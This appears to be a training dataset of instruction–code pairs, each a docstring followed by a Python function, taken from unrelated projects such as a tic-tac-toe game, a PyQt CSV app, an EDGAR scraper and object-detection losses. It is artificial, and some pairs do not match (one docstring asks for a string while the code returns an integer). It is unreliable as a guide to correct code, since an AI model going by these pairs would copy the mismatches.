+ if first == 0: + print('Player 1 goes first', end='') + out['p1'].append(0) + out['p2'].append(1) + chance = player1 + else: + print('Player 2 goes first', end='') + out['p1'].append(1) + out['p2'].append(0) + chance = player2 + return out +[INST] Uses the random module to randomly decide which player +goes first. Lookup random.randint() Return a string of +which player went first.. [/INST] def choose_first(): + return random.randint(0, 1) +[INST] Returns a boolean indicating whether a space on the board +is freely available.. [/INST] def space_check(board, position): + return board[position] == '' +[INST] Checks if the board is full and returns a boolean value. +True if full, False otherwise.. [/INST] def full_board_check(board): + return not '' in board +[INST] Takes in a board and a mark (X or O) and then checks to +see if that mark has won.. [/INST] def win_check(board, mark): + possibilities = [ + board[0:3], + board[3:6], + board[6:9], + board[0:7:3], + board[1:8:3], + board[2:9:3], + board[0:9:4], + board[2:8:2]] + return [mark] * 3 in possibilities +[INST] Asks the player if they want to play again and returns a +boolean True if they do want to play again.. [/INST] def replay(): + while True: + confirm = input('Do you want to replay ([Y]es/[N]o)? ') + if confirm[0].lower() == 'y': + return True + elif confirm[0].lower() == 'n': + return False + else: + print('Input not recognized, ', end='') + continue +[INST] Information about the function. +INPUT: No input +OUTPUT: Hello. [/INST] def name_function(): + print('Hello') +[INST] Saves the data in the model to a the current file. 
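The save below is a plain csv.writer dump of a header row followed by the data rows; reduced to the essentials (the column names are examples):

import csv

headers = ['Transaction Type', 'Date', 'Name']
rows = [['Sell', '2021-01-05', 'Alice'],
        ['Buy', '2021-01-06', 'Bob']]

with open('test.csv', 'w', encoding='utf-8', newline='') as fh:
    writer = csv.writer(fh)
    writer.writerow(headers)  # single header row
    writer.writerows(rows)    # all data rows at once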
[/INST] def save_data(self): + with open(self.filename,'w',encoding='utf-8') as fh: + writer = csv.writer(fh) + writer.writerow(self._headers) + writer.writerows(self._data) +[INST] opens a window to add transactions. [/INST] def add_transaction(self): + self.formwindow = FormWindow() + self.formwindow.submitted.connect(self.foo) + self.formwindow.show() +[INST] opens the csv file and connect the model with view +edit needed. [/INST] def open_csv(self): + if True: + table = TableWindow() + filename = 'test.csv' + self.model = CsvTableModel(filename) + self.tableview.setModel(self.model) + self.row_above_btn.setEnabled(True) + self.row_below_btn.setEnabled(True) + self.row_remove_btn.setEnabled(True) + self.save_btn.setEnabled(True) +[INST] Insert a ROW above a selected ROW. [/INST] def row_above(self): + selected = self.tableview.selectedIndexes() + row = selected[0].row() if selected else 0 + self.model.insertRows(row,1,None) +[INST] Insert a ROW below a selected ROW. [/INST] def row_below(self,somedata): + selected = self.tableview.selectedIndexes() + row = selected[-1].row() if selected else self.model.rowCount(None) + self.model.insertRows(row+1,1,None,somedata) +[INST] calling the save_data function in the CsvTableModel Class. [/INST] def save_file(self): + if self.model: + self.model.save_data() +[INST] Method will Emit a signal "submitted" to the mainwindow. +This data is used for the "TableView" model. [/INST] def onsubmit(self): + date = (self.date_widget.date().toString('yyyy-MM-dd')) + self.submitted.emit(self.transaction_type.currentText(), + date, + self.seller_name.text(), + self.product.currentText(), + self.amount.text(), + self.ppkg.text(), + self.total_price.text() + ) + self.close() +[INST] Adds the "item" to the end of the list. [/INST] def add_data(self,item_name): + self._data.append(item_name) +[INST] Removes the "item" from the list. [/INST] def remove_data(self,item_name): + self._data.remove(item_name) +[INST] Saves the item names in the model to the file. [/INST] def save_data(self): + with open(self.filename,'w',encoding='utf-8') as fh: + writer = csv.writer(fh) + writer.writerow(self._headers) + writer.writerow(self._data) +[INST] Updates the data in the graph when the filter is applied.. 
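The chart refresh below boils down to keeping only rows whose Date falls inside the selected window and summing Total Price per transaction type. A pandas-only sketch with made-up data:

import pandas as pd

df = pd.DataFrame({
    'Date': ['2021-01-01', '2021-01-02', '2021-01-05'],
    'Transaction Type': ['Sell', 'Buy', 'Sell'],
    'Total Price': [100.0, 40.0, 60.0],
})

window = pd.date_range(start='2021-01-01', end='2021-01-03').strftime('%Y-%m-%d')
in_window = df[df['Date'].isin(window)]
income = in_window.loc[in_window['Transaction Type'] == 'Sell', 'Total Price'].sum()
expense = in_window.loc[in_window['Transaction Type'] == 'Buy', 'Total Price'].sum()
print(income, expense)  # 100.0 40.0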
[/INST] def update_data(self): + self.series.clear() + self.pieseries.clear() + todate = (self.to_date.date().toString('yyyy-MM-dd')) + fromdate = (self.from_date.date().toString('yyyy-MM-dd')) + self.df = pd.read_csv('test.csv') + self.days = pd.date_range(start= todate,end=fromdate) + x = [i for i in self.df['Date'] if i in self.days] + self.temp_list = sorted(list(set(x))) + income = [sum(self.df.loc[(self.df['Date'] == i) & (self.df['Transaction Type'] == 'Sell'),'Total Price']) for i in self.temp_list] + expense = [sum(self.df.loc[(self.df['Date'] == i) & (self.df['Transaction Type'] == 'Buy' ),'Total Price']) for i in self.temp_list] + piecount = len(self.c._data) + item_list = self.c._data + for i in range(piecount): + item_name = item_list[i] + item_sold = [sum(self.df.loc[(self.df['Date'] == i ) & (self.df['Transaction Type'] == 'Buy') & (self.df[' Product ']== item_name), + ' Amount (kg) ']) for i in self.temp_list] + slice_ = qtch.QPieSlice(item_list[i],sum(item_sold)) + self.pieseries.append(slice_) + categories = self.temp_list + Income = qtch.QBarSet("Income") + Expense = qtch.QBarSet("Expense") + Income.append(income) + Expense.append(expense) + self.series.append(Income) + self.series.append(Expense) + self.axis.append(categories) +[INST] User can enter items with the help of a dialog box +item_name stores the value entered in the dialogbox and returns ("enter item",bool state). [/INST] def add_item(self): + item_name = qtw.QInputDialog.getText(self,"Add Item", + "Enter Item", + qtw.QLineEdit.Normal) + if item_name[0] == "": + qtw.QMessageBox.critical(self,"Error","Item cannot be an empty word") + elif item_name[0] in self.c._data: + qtw.QMessageBox.critical(self,"Error","Item is already added") + else: + self.c.add_data(item_name[0]) + self.c.save_data() +[INST] Read all sas '.csv' files and return results in a dictionary +Returns + +Results from sas .csv files. [/INST] def _get_sas_csv_data(self) -> dict: + csv_files = glob.glob("*.csv") + csv_data = {} + for file in csv_files: + if os.path.getsize(file) > 0: + csv_file_df = pd.read_csv(file) + for column_name in csv_file_df.columns: + csv_data[column_name] = np.array(csv_file_df[column_name]) + return csv_data +[INST] Generate the SAS input based on the template +Parameters + +params +Parameters used when rendering template. [/INST] def prerun(self, params: Parameters): + params_copy = params.convert_units() + print("Pre-run for SAS Plugin") + self._run_time = time.time_ns() + super().prerun(params_copy, filename=self.sas_inp_name) +[INST] Read SAS results and create results object +Parameters + +params +Parameters used to create SAS model + +Returnss + +SAS results object. [/INST] def postrun(self, params: Parameters) -> ResultsSAS: + print("Post-run for SAS Plugin") + if Path("CHANNEL.dat").is_file(): + with open("CHANNEL.dat", "r") as file_in, open("CHANNEL.csv", "w") as file_out: + subprocess.run(str(self.conv_channel), stdin=file_in, stdout=file_out) + if Path("PRIMAR4.dat").is_file(): + with open("PRIMAR4.dat", "r") as file_in, open("PRIMAR4.csv", "w") as file_out: + subprocess.run(str(self.conv_primar4), stdin=file_in, stdout=file_out) + time = datetime.fromtimestamp(self._run_time * 1e-9) + inputs = [p.name for p in self.extra_inputs] + inputs.append('SAS.inp') + outputs = [p for p in Path.cwd().iterdir() if p.name not in inputs] + return ResultsSAS(params, time, inputs, outputs) +[INST] Save parameters to a pickle file +Parameters + +filename_or_obj +Path to open file or file object write to. 
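The save/load pair below accepts either a filesystem path or an already-open binary file object. The dispatch idiom on its own, with pickle standing in for the real serialisation:

import pickle
from typing import BinaryIO, Union

def save_mapping(data: dict, filename_or_obj: Union[str, BinaryIO]) -> None:
    # Open the file ourselves only when given a path; otherwise write directly.
    if isinstance(filename_or_obj, str):
        with open(filename_or_obj, 'wb') as fh:
            pickle.dump(data, fh)
    else:
        pickle.dump(data, filename_or_obj)

save_mapping({'power': 1.0}, 'params.pkl')
with open('params.pkl', 'rb') as fh:
    print(pickle.load(fh))  # {'power': 1.0}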
[/INST] def save(self, filename_or_obj: Union[str, BinaryIO]): + if isinstance(filename_or_obj, str): + with open(filename_or_obj, 'wb') as file_obj: + self._save_mapping(file_obj) + else: + self._save_mapping(filename_or_obj) +[INST] Load parameters from a pickle file +Parameters + +filename_or_obj +Path to pickle file or file object to read from. [/INST] def load(self, filename_or_obj: Union[str, BinaryIO]): + if isinstance(filename_or_obj, str): + with open(filename_or_obj, 'rb') as fh: + self._load_mapping(fh) + else: + self._load_mapping(filename_or_obj) +[INST] Return parameters from a pickle file +Parameters + +filename_or_obj +Path to pickle file or file object to read from. [/INST] def from_pickle(cls, filename_or_obj: Union[str, BinaryIO]) -> Parameters: + params = cls() + params.load(filename_or_obj) + return params +[INST] Feedforward behavior of the net.. [/INST] def forward(self, x): + x = x.view(x.shape[0], -1) + x = F.relu(self.fc1(x)) + x = F.log_softmax(self.fc2(x), dim=1) + return x +[INST] Print a table of DIF status information to STDOUT.. [/INST] def print_status_table(dif_statuses: List[DIFStatus], + table_format: str) -> None: + rows = [] + headers = [ + "IP", "DIF Updated", "HW Updated", "DIF Contributor*", + "HW Contributor*", "Functions\nDefined", "Functions\nImplemented", + "Stage" + ] + for dif_status in dif_statuses: + hw_last_modified = dif_status.hw_last_modified[:10] + dif_last_modified = dif_status.dif_last_modified[:10] + if dif_status.hw_last_modified > dif_status.dif_last_modified: + hw_last_modified = colored(hw_last_modified, "yellow") + dif_last_modified = colored(dif_last_modified, "yellow") + if dif_status.api_complete: + num_funcs_defined = colored(dif_status.num_functions_defined, + "green") + num_funcs_implemented = colored( + dif_status.num_functions_implemented, "green") + else: + num_funcs_defined = colored(dif_status.num_functions_defined, + "red") + num_funcs_implemented = colored( + dif_status.num_functions_implemented, "red") + rows.append([ + dif_status.ip, dif_last_modified, hw_last_modified, + "\n".join(dif_status.dif_main_contributors), + "\n".join(dif_status.hw_main_contributors), num_funcs_defined, + num_funcs_implemented, dif_status.lifecycle_state + ]) + print("DIF Statuses:") + print(tabulate(rows, headers, tablefmt=table_format)) + print("""*Only the top two contributors (by LOC) """ + """for each component are listed.""") + print(colored("Yellow", "yellow"), + "\t= HW has been updated since the DIF.") + print( + colored("Green", "green"), + """\t= DIF API, as defined in the current header file, is complete. """ + """Note, the header file may lack necessary API functionality.""") + print(colored("Red", "red"), + ("\t= DIF API is incomplete, as defined in the header file or the " + "work has not yet begun.")) +[INST] Print a table of specific functions names DIF functions to STDOUT.. 
[/INST] def print_function_set(dif_statuses: List[DIFStatus], + dif_function_type: _DIFFunctionType, + table_format: str) -> None: + if dif_function_type == _DIFFunctionType.ALERT: + print("Alert Functions:") + elif dif_function_type == _DIFFunctionType.IRQ: + print("IRQ Functions:") + elif dif_function_type == _DIFFunctionType.UNIMPLEMENTED: + print("Unimplemented Functions:") + else: + logging.error("Invalid function type to print table.") + sys.exit(1) + rows = [] + headers = ["IP", "Function"] + for dif_status in dif_statuses: + if dif_function_type == _DIFFunctionType.ALERT: + if dif_status.alert_funcs: + rows.append([dif_status.ip, "\n".join(dif_status.alert_funcs)]) + elif dif_function_type == _DIFFunctionType.IRQ: + if dif_status.irq_funcs: + rows.append([dif_status.ip, "\n".join(dif_status.irq_funcs)]) + elif dif_function_type == _DIFFunctionType.UNIMPLEMENTED: + if not dif_status.api_complete: + rows.append( + [dif_status.ip, "\n".join(dif_status.funcs_unimplemented)]) + else: + logging.error("Invalid function type to print table.") + sys.exit(1) + print(tabulate(rows, headers, tablefmt=table_format)) +[INST] Get all urls for specific company according to CIK that match +start date, end date, filing_type, and count parameters.. [/INST] def _get_urls_for_cik(self, cik, **kwargs): + self.params['CIK'] = cik + links = [] + self.params["start"] = 0 + while len(links) < self._client.count: + data = self._client.get_soup(self.path, self.params, **kwargs) + links.extend([link.string for link in data.find_all("filinghref")]) + self.params["start"] += self._client.count + if len(data.find_all("filinghref")) == 0: + break + txt_urls = [link[:link.rfind("-")] + ".txt" for link in links] + return txt_urls[:self.client.count] +[INST] Save files in specified directory.. [/INST] def save(self, directory): + urls = self.get_urls() + if len(urls) == 0: + raise ValueError("No filings available.") + doc_names = [url.split("/")[-1] for url in urls] + for (url, doc_name) in list(zip(urls, doc_names)): + cik = doc_name.split('-')[0] + data = requests.get(url).text + path = os.path.join(directory, cik, self.filing_type.value) + make_path(path) + path = os.path.join(path, doc_name) + with open(path, "w") as f: + f.write(data) +[INST] Sanitizes date to be in acceptable format for EDGAR.. [/INST] def sanitize_date(date): + if isinstance(date, datetime.datetime): + return date.strftime("%Y%m%d") + elif isinstance(date, str): + if len(date) != 8: + raise TypeError('Date must be of the form YYYYMMDD') + elif isinstance(date, int): + if date < 10 ** 7 or date > 10 ** 8: + raise TypeError('Date must be of the form YYYYMMDD') + return date +[INST] Make directory based on filing info.. [/INST] def make_path(path, **kwargs): + if not os.path.exists(path): + try: + os.makedirs(path, **kwargs) + except OSError as e: + if e.errno != errno.EEXIST: + raise OSError +[INST] Ensures response from EDGAR is valid.. [/INST] def _validate_response(response): + error_messages = ("The value you submitted is not valid", + "No matching Ticker Symbol.", + "No matching CIK.", + "No matching companies.") + if response is None: + raise EDGARQueryError("No response.") + status_code = response.status_code + if 400 <= status_code < 500: + if status_code == 400: + raise EDGARQueryError("The query could not be completed. " + "The page does not exist.") + else: + raise EDGARQueryError("The query could not be completed. 
" + "There was a client-side error with your " + "request.") + elif 500 <= status_code < 600: + raise EDGARQueryError("The query could not be completed. " + "There was a server-side error with " + "your request.") + elif any(error_message in response.text for error_message in error_messages): + raise EDGARQueryError() +[INST] Get cik for lookup value.. [/INST] def _get_cik(self, lookup): + self._validate_lookup(lookup) + try: + self._params['CIK'] = lookup + soup = self._client.get_soup(self.path, self.params) + except EDGARQueryError: + del self._params['CIK'] + self._params['company'] = lookup + soup = self._client.get_soup(self.path, self.params) + try: + span = soup.find('span', {'class': 'companyName'}) + return span.find('a').getText().split()[0] + except AttributeError: + warnings.warn("Lookup '{0}' will be skipped. " + "Found multiple companies matching '{0}':".format(lookup)) + warnings.warn('\n'.join(self._get_cik_possibilities(soup))) + finally: + if self._params.get('company') is not None: + del self._params['company'] + if self._params.get('CIK') is not None: + del self._params['CIK'] +[INST] Ensure that lookup is string.. [/INST] def _validate_lookup(lookup): + if not isinstance(lookup, str): + raise TypeError("Lookup value must be string. Given type {0}.".format(type(lookup))) +[INST] Publish PR comment with link to build logs.. [/INST] def publish_pr_comment(self, build): + pr_comment = PR_COMMENT_TEMPLATE.format( + project_name=config.PROJECT_NAME, + commit_id=build.commit_id, + build_status=build.status, + logs_url=build.get_logs_url(), + ) + repo = self._get_repo() + LOG.debug('Publishing PR Comment: repo=%s/%s, pr_id=%s, comment=%s', + self._github_owner, self._github_repo, build.get_pr_id(), pr_comment) + repo.get_pull(build.get_pr_id()).create_issue_comment(pr_comment) +[INST] plot 3 histogram of data projecting to difference vector w. [/INST] def exec_c3_1_a(X_a, X_b, init_w): + n_histogram = 3 + proj_a = np.zeros((X_a.shape[0], n_histogram)) + proj_b = np.zeros((X_b.shape[0], n_histogram)) + new_w = np.zeros((init_w.shape[0], n_histogram)) + for i in range(n_histogram): + new_w[:, i] = (init_w + np.array(np.random.randn(*init_w.shape))).ravel() + proj_a[:, i] = utils.project_X_onto_w(X_a, new_w[:, i]).ravel() + proj_b[:, i] = utils.project_X_onto_w(X_b, new_w[:, i]).ravel() + plot_data.plt_histogram(proj_a, proj_b, new_w) +[INST] plot probability contours and the optimal projection line. 
[/INST] def plot_prob_contours(Gaus_dist_a, Gaus_dist_b, with_unbalance=False): + assert(isinstance(Gaus_dist_a, model.GausDS) and isinstance(Gaus_dist_b, model.GausDS)) + X_a, X_b = Gaus_dist_a.data, Gaus_dist_b.data + n_a = len(X_a) + n_b = len(X_b) + l_s_scalar_min = -9 + l_s_scalar_max = 9 + ls_x1 = np.linspace(l_s_scalar_min, l_s_scalar_max, 100) + ls_x2 = np.linspace(l_s_scalar_min, l_s_scalar_max, 100) + mg_x1, mg_x2 = np.meshgrid(ls_x1, ls_x2) + pdf_a = Gaus_dist_a.Gaussian_pdf(mg_x1, mg_x2, 100) + pdf_b = Gaus_dist_b.Gaussian_pdf(mg_x1, mg_x2, 100) + pdf_a = pdf_a * n_a/(n_a+n_b) + pdf_b = pdf_b * n_b/(n_a+n_b) + fig = plt.figure() + ax = fig.add_subplot(111) + ax.axis('equal') + ax.set_title("2 Class Classification") + ax.scatter(X_a[:, 0], X_a[:, 1], marker='.', c='r', label='class a') + ax.scatter(X_b[:, 0], X_b[:, 1], marker='+', c='b', label='class b') + ax.contour(mg_x1, mg_x2, pdf_a, 10) + ax.contour(mg_x1, mg_x2, pdf_b, 10) + log_odds = np.log(pdf_a) - np.log(pdf_b) + list_border = [] + for i in range(99): + for j in range(99): + if (log_odds[i][j]*log_odds[i][j+1] < 0) or (log_odds[i][j]*log_odds[i+1][j] < 0) \ + or log_odds[i][j] == 0: + list_border.append([i, j]) + bd = np.array(list_border) + X1 = np.linspace(l_s_scalar_min, l_s_scalar_max, 100) + Y1 = np.linspace(l_s_scalar_min, l_s_scalar_max, 100) + ax.scatter(X1[bd[:, 0]], Y1[bd[:, 1]], marker='.', s=15, color='brown', label='decision border') + init_w = np.array([1, -2]).reshape(-1, 1) + fs_clf = model.FisherScoreClassifier(X_a, X_b, init_w) + w_star = fs_clf.classify(plot=False) + w_star = np.array(w_star) + xielv = w_star[1]/w_star[0] + x_point = np.linspace(-5, 3, 100) + y_point = x_point * xielv - 4 + plt.plot(x_point, y_point, c='g', label='optimal w') + if with_unbalance: + w_star = fs_clf.classify(balanced=False, plot=False) + w_star = np.array(w_star) + xielv = w_star[1]/w_star[0] + x_point = np.linspace(-5, 3, 100) + y_point = x_point * xielv - 4 + plt.plot(x_point, y_point, c='purple', label='unbalanced F(w)') + leg = ax.legend(loc='upper right', fancybox=True, fontsize=8) + leg.get_frame().set_alpha(0.5) + plt.show() +[INST] project a list of vectors X onto a vector w. [/INST] def project_X_onto_w(X, v_w): + w_length = np.linalg.norm(v_w) + assert(w_length > 0) + return np.divide((X @ v_w), w_length) +[INST] Signals to the transport that it should stop.. [/INST] async def stop(self): + raise NotImplementedError +[INST] Pushes a message to a channel.. [/INST] async def push(self, event, payload): + msg = await self.socket._send_message(self.topic, event, payload) + return msg +[INST] Classification loss (NLL) +targets dicts must contain the key "labels" containing a tensor of dim [nb_target_boxes]. 
[/INST] def loss_labels(self, outputs, targets, indices, num_planes, log=True): + assert 'pred_logits' in outputs + src_logits = outputs['pred_logits'] + idx = self._get_src_permutation_idx(indices) + target_classes_o = torch.cat([tgt[:, 0][J].long() for tgt, (_, J) in zip (targets, indices)]) + target_classes = torch.full(src_logits.shape[:2], self.num_classes, dtype=torch.int64, device=src_logits.device) + target_classes[idx] = target_classes_o + loss_ce = F.cross_entropy(src_logits.transpose(1, 2), target_classes, self.empty_weight.cuda()) + losses = {'loss_ce': loss_ce} + if log: + losses['class_error'] = 100 - accuracy(src_logits[idx], target_classes_o)[0] + return losses +[INST] Compute the cardinality error, ie the absolute error in the number of predicted non-empty boxes +This is not really a loss, it is intended for logging purposes only. It doesn't propagate gradients. [/INST] def loss_cardinality(self, outputs, targets, indices, num_planes): + pred_logits = outputs['pred_logits'] + device = pred_logits.device + tgt_lengths = torch.as_tensor([tgt.shape[0] for tgt in targets], device=device) + card_pred = (pred_logits.argmax(-1) != pred_logits.shape[-1] - 1).sum(1) + card_err = F.l1_loss(card_pred.float(), tgt_lengths.float()) + losses = {'cardinality_error': card_err} + return losses +[INST] Compute the losses related to the bounding boxes, the L1 regression loss and the GIoU loss +targets dicts must contain the key "boxes" containing a tensor of dim [nb_target_boxes, 4] +The target boxes are expected in format (center_x, center_y, h, w), normalized by the image size.. [/INST] def loss_param(self, outputs, targets, indices, num_planes, log=True): + assert 'pred_param' in outputs + idx = self._get_src_permutation_idx(indices) + src_param = outputs['pred_param'][idx] + target_param = torch.cat([tgt[:, 1:4][i] for tgt, (_, i) in zip(targets, indices)], dim=0) + loss_param_l1 = torch.mean(torch.sum(torch.abs(target_param - src_param), dim=1)) + similarity = torch.nn.functional.cosine_similarity(src_param, target_param, dim=1) + loss_param_cos = torch.mean(1-similarity) + angle = torch.mean(torch.acos(torch.clamp(similarity, -1, 1))) + losses = {} + losses['loss_param_l1'] = loss_param_l1 + losses['loss_param_cos'] = loss_param_cos + if log: + losses['mean_angle'] = angle * 180.0 / np.pi + return losses +[INST] Compute the losses related to the bounding boxes, the L1 regression loss and the GIoU loss +targets dicts must contain the key "boxes" containing a tensor of dim [nb_target_boxes, 4] +The target boxes are expected in format (center_x, center_y, h, w), normalized by the image size.. 
[/INST] def loss_center(self, outputs, targets, indices, num_planes, log=True): + assert 'pred_center' in outputs + idx = self._get_src_permutation_idx(indices) + src_center = outputs['pred_center'][idx] + target_center = torch.cat([tgt[:, 4:6][i] for tgt, (_, i) in zip(targets, indices)], dim=0) + delta_xy = torch.abs(target_center - src_center) + dist = torch.norm(delta_xy, dim=-1) + loss_center_l2 = torch.mean(dist) + losses = {} + losses['loss_center_instance'] = loss_center_l2 + if 'gt_plane_pixel_centers' in outputs.keys(): + gt_plane_pixel_centers = outputs['gt_plane_pixel_centers'] + pixel_center = outputs['pixel_center'] + valid_region = outputs['valid_region'] + mask = valid_region > 0 + pixel_dist = torch.norm(torch.abs(gt_plane_pixel_centers - pixel_center), dim=1, keepdim=True) + loss_pixel_center = torch.mean(pixel_dist[mask]) + losses['loss_center_pixel'] = loss_pixel_center + return losses +[INST] This performs the loss computation.. [/INST] def forward(self, outputs, targets): + outputs_without_aux = {k: v for k, v in outputs.items() if k != 'aux_outputs'} + indices = self.matcher(outputs_without_aux, targets) + num_planes = sum(tgt.shape[0] for tgt in targets) + num_planes = torch.as_tensor([num_planes], dtype=torch.float, device=next(iter(outputs.values())).device) + if is_dist_avail_and_initialized(): + torch.distributed.all_reduce(num_planes) + num_planes = torch.clamp(num_planes / get_world_size(), min=1).item() + losses = {} + for loss in self.losses: + losses.update(self.get_loss(loss, outputs, targets, indices, num_planes)) + losses_aux = [] + if 'aux_outputs' in outputs.keys(): + for i, aux_outputs in enumerate(outputs['aux_outputs']): + losses_aux_i = {} + for loss in self.losses: + kwargs = {} + if 'param' in loss or 'Q' in loss or 'depth' in loss: + continue + kwargs = {'log': False} + l_dict = self.get_loss(loss, aux_outputs, targets, indices, num_planes, **kwargs) + losses_aux_i.update(l_dict) + losses_aux.append(losses_aux_i) + return losses, indices, losses_aux +[INST] Randomly sample a batch of experiences from memory.. [/INST] def sample(self, device): + experiences = random.sample(self.memory, k=self.batch_size) + states = torch.from_numpy(np.vstack([e.state for e in experiences if e is not None])).float().to(device) + actions = torch.from_numpy(np.vstack([e.action for e in experiences if e is not None])).long().to(device) + rewards = torch.from_numpy(np.vstack([e.reward for e in experiences if e is not None])).float().to(device) + next_states = torch.from_numpy(np.vstack([e.next_state for e in experiences if e is not None])).float().to(device) + dones = torch.from_numpy(np.vstack([e.done for e in experiences if e is not None]).astype(np.uint8)).float().to(device) + return (states, actions, rewards, next_states, dones) +[INST] Add a new experience to memory.. [/INST] def add(self, state, action, reward, next_state, done): + self.length = min(self.length+1, self.buffer_size) + max_p = self.get_max_p(); + self.tree.add(max_p, (state, action, reward, next_state, done)) +[INST] Convenience property to retrieve the value tuple as a tuple of +datetime objects.. [/INST] def value_as_datetime(self): + if self.value is None: + return None + v1, v2 = self.value + if isinstance(v1, numbers.Number): + d1 = datetime.utcfromtimestamp(v1 / 1000) + else: + d1 = v1 + if isinstance(v2, numbers.Number): + d2 = datetime.utcfromtimestamp(v2 / 1000) + else: + d2 = v2 + return d1, d2 +[INST] Convenience property to retrieve the value tuple as a tuple of +date objects.. 
[/INST] def value_as_date(self): + if self.value is None: + return None + v1, v2 = self.value + if isinstance(v1, numbers.Number): + dt = datetime.utcfromtimestamp(v1 / 1000) + d1 = date(*dt.timetuple()[:3]) + else: + d1 = v1 + if isinstance(v2, numbers.Number): + dt = datetime.utcfromtimestamp(v2 / 1000) + d2 = date(*dt.timetuple()[:3]) + else: + d2 = v2 + return d1, d2 +[INST] Compute functions for plot(df, x) +Parameters + +df +DataFrame from which visualizations are generated +x +A column name from the DataFrame +cfg +Config instance +dtype: str or DType or dict of str or dict of DType, default None +Specify Data Types for designated column or all columns.. [/INST] def compute_univariate( + df: Union[dd.DataFrame, pd.DataFrame], + col: Union[str, LatLong], + cfg: Config, + dtype: Optional[DTypeDef], +) -> Intermediate: + new_col_names, ndf = gen_new_df_with_used_cols(df, col, None, None) + x = new_col_names[col] + if x is None: + raise ValueError + frame = EDAFrame(ndf, dtype) + col_dtype = frame.get_eda_dtype(x) + if isinstance(col_dtype, (Nominal, GeoPoint, SmallCardNum)): + srs = frame.get_col_as_str(x) + (data,) = dask.compute(nom_comps(srs, cfg)) + return Intermediate(col=x, data=data, visual_type="categorical_column") + elif isinstance(col_dtype, Continuous): + (data,) = dask.compute(cont_comps(frame.frame[x], cfg)) + return Intermediate(col=x, data=data, visual_type="numerical_column") + elif isinstance(col_dtype, DateTime): + data_dt: List[Any] = [] + data_dt.append(dask.delayed(calc_stats_dt)(frame.frame[x])) + if cfg.line.enable: + data_dt.append(dask.delayed(_calc_line_dt)(frame.frame[[x]], cfg.line.unit)) + data, line = dask.compute(*data_dt) + else: + data = dask.compute(*data_dt)[0] + line = [] + return Intermediate( + col=x, + data=data, + line=line, + visual_type="datetime_column", + ) + elif isinstance(col_dtype, GeoGraphy): + (data,) = dask.compute(nom_comps(frame.frame[x], cfg)) + return Intermediate(col=x, data=data, visual_type="geography_column") + else: + raise ValueError(f"unprocessed type. col:{x}, type:{col_dtype}") +[INST] All computations required for plot(df, Nominal). Assume srs is string column.. 
[/INST] def nom_comps(srs: dd.Series, cfg: Config) -> Dict[str, Any]: + data: Dict[str, Any] = dict() + data["nrows"] = srs.shape[0] + srs = srs.dropna() + grps = srs.value_counts(sort=False) + data["geo"] = grps + data["nuniq"] = grps.shape[0] + if cfg.bar.enable or cfg.pie.enable or cfg.value_table.enable: + data["bar"] = ( + grps.nlargest(cfg.bar.bars) if cfg.bar.sort_descending else grps.nsmallest(cfg.bar.bars) + ) + if cfg.bar.bars == cfg.pie.slices and cfg.bar.sort_descending == cfg.pie.sort_descending: + data["pie"] = data["bar"] + else: + data["pie"] = ( + grps.nlargest(cfg.pie.slices) + if cfg.pie.sort_descending + else grps.nsmallest(cfg.pie.slices) + ) + if cfg.bar.bars == cfg.value_table.ngroups and cfg.bar.sort_descending: + data["value_table"] = data["bar"] + elif cfg.pie.slices == cfg.value_table.ngroups and cfg.pie.sort_descending: + data["value_table"] = data["pie"] + else: + data["value_table"] = grps.nlargest(cfg.value_table.ngroups) + if cfg.insight.enable: + data["chisq"] = chisquare(grps.values) + df = grps.reset_index() + if cfg.stats.enable or cfg.value_table.enable: + data.update(_calc_nom_stats(srs, df, data["nrows"], data["nuniq"])) + elif cfg.wordfreq.enable and cfg.insight.enable: + data["len_stats"] = {"Minimum": srs.str.len().min(), "Maximum": srs.str.len().max()} + if cfg.wordlen.enable: + lens = srs.str.len() + data["len_hist"] = da.histogram(lens, cfg.wordlen.bins, (lens.min(), lens.max())) + if cfg.wordcloud.enable or cfg.wordfreq.enable: + if all( + getattr(cfg.wordcloud, att) == getattr(cfg.wordfreq, att) + for att in ("top_words", "stopword", "stem", "lemmatize") + ): + word_freqs = _calc_word_freq( + df, + cfg.wordfreq.top_words, + cfg.wordfreq.stopword, + cfg.wordfreq.lemmatize, + cfg.wordfreq.stem, + ) + data["word_cnts_cloud"] = word_freqs["word_cnts"] + data["nuniq_words_cloud"] = word_freqs["nuniq_words"] + else: + word_freqs = _calc_word_freq( + df.copy(), + cfg.wordfreq.top_words, + cfg.wordfreq.stopword, + cfg.wordfreq.lemmatize, + cfg.wordfreq.stem, + ) + word_freqs_cloud = _calc_word_freq( + df, + cfg.wordcloud.top_words, + cfg.wordcloud.stopword, + cfg.wordcloud.lemmatize, + cfg.wordcloud.stem, + ) + data["word_cnts_cloud"] = word_freqs_cloud["word_cnts"] + data["nuniq_words_cloud"] = word_freqs["nuniq_words"] + data["word_cnts_freq"] = word_freqs["word_cnts"] + data["nwords_freq"] = word_freqs["nwords"] + return data +[INST] All computations required for plot(df, Continuous). 
[/INST] def cont_comps(srs: dd.Series, cfg: Config) -> Dict[str, Any]: + data: Dict[str, Any] = {} + data["nrows"] = srs.shape[0] + srs = srs.dropna() + data["npres"] = srs.shape[0] + srs = srs[~srs.isin({np.inf, -np.inf})] + if cfg.hist.enable or cfg.qqnorm.enable and cfg.insight.enable: + data["hist"] = da.histogram(srs, cfg.hist.bins, (srs.min(), srs.max())) + if cfg.insight.enable: + data["norm"] = normaltest(data["hist"][0]) + if cfg.hist.enable and cfg.insight.enable: + data["chisq"] = chisquare(data["hist"][0]) + if cfg.qqnorm.enable: + data["qntls"] = srs.quantile(np.linspace(0.01, 0.99, 99)) + elif cfg.stats.enable: + data["qntls"] = srs.quantile([0.05, 0.25, 0.5, 0.75, 0.95]) + elif cfg.box.enable: + data["qntls"] = srs.quantile([0.25, 0.5, 0.75]) + if cfg.stats.enable or cfg.hist.enable and cfg.insight.enable: + data["skew"] = skew(srs) + if cfg.stats.enable or cfg.qqnorm.enable: + data["mean"] = srs.mean() + data["std"] = srs.std() + if cfg.stats.enable: + data["min"] = srs.min() + data["max"] = srs.max() + data["nreals"] = srs.shape[0] + data["nzero"] = (srs == 0).sum() + data["nneg"] = (srs < 0).sum() + data["kurt"] = kurtosis(srs) + data["mem_use"] = srs.memory_usage(deep=True) + if cfg.kde.enable: + if not math.isclose(dask.compute(data["min"])[0], dask.compute(data["max"])[0]): + data["dens"] = da.histogram(srs, cfg.kde.bins, (srs.min(), srs.max()), density=True) + data["kde"] = gaussian_kde( + srs.map_partitions(lambda x: x.sample(min(1000, x.shape[0])), meta=srs) + ) + else: + data["kde"] = None + if cfg.box.enable: + data.update(_calc_box(srs, data["qntls"], cfg)) + if 